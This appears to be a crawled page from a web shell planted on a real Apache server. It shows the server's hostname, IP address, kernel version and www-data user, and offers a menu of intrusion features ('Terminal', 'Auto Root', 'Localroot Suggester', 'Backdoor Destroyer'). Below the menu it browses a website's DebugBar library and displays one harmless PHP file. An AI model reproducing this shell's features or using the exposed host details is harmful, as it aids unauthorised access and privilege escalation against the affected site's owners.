Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
ctm.bdcloud.fr /
includes /
DebugBar /
Delete
Unzip
Name
Size
Permission
Date
Action
Bridge
[ DIR ]
drwxr-xr-x
2025-11-08 11:15
DataCollector
[ DIR ]
drwxr-xr-x
2025-11-08 11:15
DataFormatter
[ DIR ]
drwxr-xr-x
2025-11-08 11:15
Resources
[ DIR ]
drwxr-xr-x
2025-11-08 11:15
Storage
[ DIR ]
drwxr-xr-x
2025-11-08 11:15
DebugBar.php
11.98
KB
-rw-r--r--
2020-09-03 11:41
DebugBarException.php
305
B
-rw-r--r--
2020-09-03 11:41
HttpDriverInterface.php
1.2
KB
-rw-r--r--
2020-09-03 11:41
JavascriptRenderer.php
27.22
KB
-rw-r--r--
2020-09-03 11:41
OpenHandler.php
2.55
KB
-rw-r--r--
2020-09-03 11:41
PhpHttpDriver.php
928
B
-rw-r--r--
2020-09-03 11:41
RequestIdGenerator.php
477
B
-rw-r--r--
2020-09-03 11:41
RequestIdGeneratorInterface.php
416
B
-rw-r--r--
2020-09-03 11:41
StandardDebugBar.php
1011
B
-rw-r--r--
2020-09-03 11:41
Save
Rename
<?php /* * This file is part of the DebugBar package. * * (c) 2013 Maxime Bouroumeau-Fuseau * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace DebugBar; /** * HTTP driver for native php */ class PhpHttpDriver implements HttpDriverInterface { function setHeaders(array $headers) { foreach ($headers as $name => $value) { header("$name: $value"); } } function isSessionStarted() { return isset($_SESSION); } function setSessionValue($name, $value) { $_SESSION[$name] = $value; } function hasSessionValue($name) { return array_key_exists($name, $_SESSION); } function getSessionValue($name) { return $_SESSION[$name]; } function deleteSessionValue($name) { unset($_SESSION[$name]); } }